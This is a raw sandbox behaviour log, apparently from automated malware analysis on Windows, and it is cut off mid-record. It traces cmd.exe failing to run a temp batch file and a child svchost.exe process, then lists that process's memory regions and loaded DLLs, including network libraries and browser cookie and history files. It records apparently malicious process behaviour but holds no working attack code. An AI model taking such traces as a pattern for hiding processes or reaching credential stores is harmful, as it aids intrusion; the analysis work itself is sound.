FindNextFileW (in: hFindFile=0x545098, lpFindFileData=0x544894 | out: lpFindFileData=0x544894) returned 0 [0338.206] GetLastError () returned 0x12 [0338.206] FindClose (in: hFindFile=0x545098 | out: hFindFile=0x545098) returned 1 [0338.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.207] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0338.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0338.207] _get_osfhandle (_FileHandle=0) returned 0x3 [0338.207] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0338.207] SetConsoleInputExeNameW () returned 0x1 [0338.207] GetConsoleOutputCP () returned 0x1b5 [0338.207] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0338.207] SetThreadUILanguage (LangId=0x0) returned 0x409 [0338.207] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf2e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0338.207] GetLastError () returned 0x2 [0338.208] _get_osfhandle (_FileHandle=2) returned 0xb [0338.208] GetFileType (hFile=0xb) returned 0x2 [0338.208] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0338.208] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf29c | out: lpMode=0x1cf29c) returned 1 [0338.208] _get_osfhandle (_FileHandle=2) returned 0xb [0338.208] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1cf2d0 | out: lpConsoleScreenBufferInfo=0x1cf2d0) returned 1 [0338.208] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4a564640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0338.209] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236c, dwLanguageId=0x0, lpBuffer=0x4a564640, nSize=0x2000, Arguments=0x1cf310 | out: lpBuffer="The batch file cannot be found.\r\n") returned 0x21 [0338.209] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a564640*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x1cf2f4, lpReserved=0x0 | out: lpBuffer=0x4a564640*, lpNumberOfCharsWritten=0x1cf2f4*=0x21) returned 1 [0338.209] CmdBatNotification () returned 0x1 [0338.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.209] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0338.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.209] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0338.209] _get_osfhandle (_FileHandle=0) returned 0x3 [0338.209] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0338.210] SetConsoleInputExeNameW () returned 0x1 [0338.210] GetConsoleOutputCP () returned 0x1b5 [0338.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0338.210] SetThreadUILanguage (LangId=0x0) returned 0x409 [0338.210] exit (_Code=1) Process: id = "24" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x62dd8000" os_pid = "0x638" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x7e8" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" cur_dir = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f83e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3979 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3980 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3981 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3982 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3983 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3984 start_va = 0x70000 end_va = 0x8bfff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3985 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3986 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3987 start_va = 0x4a0000 end_va = 0x4a7fff entry_point = 0x4a0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe") Region: id = 3988 start_va = 0x77ad0000 end_va = 0x77c78fff entry_point = 0x77ad0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3989 start_va = 0x77cb0000 end_va = 0x77e2ffff entry_point = 0x77cb0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3990 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3991 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3992 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3993 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3994 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3995 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3996 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3997 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3998 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3999 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4000 start_va = 0x743d0000 end_va = 0x743d7fff entry_point = 0x743d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4001 start_va = 0x743e0000 end_va = 0x7443bfff entry_point = 0x743e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4002 start_va = 0x74440000 end_va = 0x7447efff entry_point = 0x74440000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4003 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 4004 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4005 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4006 start_va = 0x250000 end_va = 0x2b6fff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4007 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4008 start_va = 0x75800000 end_va = 0x7580bfff entry_point = 0x75800000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4009 start_va = 0x75810000 end_va = 0x7586ffff entry_point = 0x75810000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4010 start_va = 0x759c0000 end_va = 0x75acffff entry_point = 0x759c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4011 start_va = 0x75e70000 end_va = 0x75f1bfff entry_point = 0x75e70000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4012 start_va = 0x76640000 end_va = 0x76685fff entry_point = 0x76640000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4013 start_va = 0x767d0000 end_va = 0x767e8fff entry_point = 0x767d0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4014 start_va = 0x76800000 end_va = 0x768effff entry_point = 0x76800000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4015 start_va = 0x778b0000 end_va = 0x779a9fff entry_point = 0x0 region_type = private name = "private_0x00000000778b0000" filename = "" Region: id = 4016 start_va = 0x779b0000 end_va = 0x77acefff entry_point = 0x0 region_type = private name = "private_0x00000000779b0000" filename = "" Region: id = 4017 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4018 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4019 start_va = 0x758c0000 end_va = 0x759bffff entry_point = 0x758c0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4020 start_va = 0x76950000 end_va = 0x769dffff entry_point = 0x76950000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4021 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4022 start_va = 0x76110000 end_va = 0x761acfff entry_point = 0x76110000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4023 start_va = 0x77740000 end_va = 0x777dffff entry_point = 0x77740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4024 start_va = 0x90000 end_va = 0xadfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4025 start_va = 0x640000 end_va = 0x7c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 4026 start_va = 0x90000 end_va = 0xadfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4027 start_va = 0x760b0000 end_va = 0x7610ffff entry_point = 0x760b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4028 start_va = 0x76570000 end_va = 0x7663bfff entry_point = 0x76570000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4029 start_va = 0x7d0000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 4030 start_va = 0x960000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 4031 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4032 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 4033 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4034 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 4035 start_va = 0x1d60000 end_va = 0x2152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d60000" filename = "" Region: id = 4036 start_va = 0x76240000 end_va = 0x7635cfff entry_point = 0x76240000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 4037 start_va = 0x76360000 end_va = 0x7636bfff entry_point = 0x76360000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 4038 start_va = 0x76a70000 end_va = 0x776b9fff entry_point = 0x76a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4039 start_va = 0x76370000 end_va = 0x763c6fff entry_point = 0x76370000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4040 start_va = 0x75ad0000 end_va = 0x75ad4fff entry_point = 0x75ad0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 4041 start_va = 0x75ae0000 end_va = 0x75c3bfff entry_point = 0x75ae0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4042 start_va = 0x75f20000 end_va = 0x76014fff entry_point = 0x75f20000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4043 start_va = 0x76690000 end_va = 0x767c5fff entry_point = 0x76690000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4044 start_va = 0x761b0000 end_va = 0x7623efff entry_point = 0x761b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4045 start_va = 0x75c40000 end_va = 0x75e3afff entry_point = 0x75c40000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4046 start_va = 0x75690000 end_va = 0x75697fff entry_point = 0x75690000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4047 start_va = 0x360000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 4048 start_va = 0x75670000 end_va = 0x75685fff entry_point = 0x75670000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4049 start_va = 0x1d0000 end_va = 0x20bfff entry_point = 0x1d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4050 start_va = 0x1d0000 end_va = 0x20bfff entry_point = 0x1d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4051 start_va = 0x1d0000 end_va = 0x20bfff entry_point = 0x1d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4052 start_va = 0x1d0000 end_va = 0x20bfff entry_point = 0x1d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4053 start_va = 0x1d0000 end_va = 0x20bfff entry_point = 0x1d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4054 start_va = 0x75630000 end_va = 0x7566afff entry_point = 0x75630000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4055 start_va = 0x2160000 end_va = 0x242efff entry_point = 0x2160000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4056 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4057 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 4058 start_va = 0x3d0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4059 start_va = 0x4f0000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 4060 start_va = 0x2430000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 4061 start_va = 0x2480000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 4062 start_va = 0x2520000 end_va = 0x255ffff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 4063 start_va = 0x2590000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 4064 start_va = 0x25e0000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 4065 start_va = 0x2690000 end_va = 0x26cffff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 4066 start_va = 0x26d0000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 4067 start_va = 0x2760000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 4068 start_va = 0x27a0000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 4069 start_va = 0x27e0000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 4070 start_va = 0x28e0000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 4071 start_va = 0x2940000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 4072 start_va = 0x2990000 end_va = 0x29cffff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 4073 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 4074 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 4075 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 4076 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 4077 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 4078 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 4079 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 4080 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 4081 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4082 start_va = 0x75490000 end_va = 0x7562dfff entry_point = 0x75490000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 4083 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0xd0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4084 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4085 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4086 start_va = 0x756d0000 end_va = 0x756dafff entry_point = 0x756d0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4087 start_va = 0x130000 end_va = 0x13bfff entry_point = 0x130000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4088 start_va = 0x140000 end_va = 0x147fff entry_point = 0x140000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4089 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x150000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4108 start_va = 0x160000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4109 start_va = 0x75460000 end_va = 0x75480fff entry_point = 0x75460000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 4110 start_va = 0x76900000 end_va = 0x76944fff entry_point = 0x76900000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 4111 start_va = 0x777e0000 end_va = 0x77814fff entry_point = 0x777e0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4112 start_va = 0x767f0000 end_va = 0x767f5fff entry_point = 0x767f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4113 start_va = 0x2820000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 4114 start_va = 0x75410000 end_va = 0x75453fff entry_point = 0x75410000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 4115 start_va = 0x160000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4116 start_va = 0x756b0000 end_va = 0x756cbfff entry_point = 0x756b0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4117 start_va = 0x756e0000 end_va = 0x756e6fff entry_point = 0x756e0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4118 start_va = 0x29d0000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 4119 start_va = 0x2840000 end_va = 0x287ffff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 4120 start_va = 0x28a0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 4121 start_va = 0x2b70000 end_va = 0x2baffff entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 4122 start_va = 0x753f0000 end_va = 0x75406fff entry_point = 0x753f0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 4123 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 4124 start_va = 0x76a40000 end_va = 0x76a6cfff entry_point = 0x76a40000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 4125 start_va = 0x753b0000 end_va = 0x753e9fff entry_point = 0x753b0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 4126 start_va = 0x2c00000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 4127 start_va = 0x2c70000 end_va = 0x2caffff entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 4128 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 4129 start_va = 0x75350000 end_va = 0x753a1fff entry_point = 0x75350000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 4130 start_va = 0x75330000 end_va = 0x75344fff entry_point = 0x75330000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 4131 start_va = 0x756a0000 end_va = 0x756acfff entry_point = 0x756a0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 4132 start_va 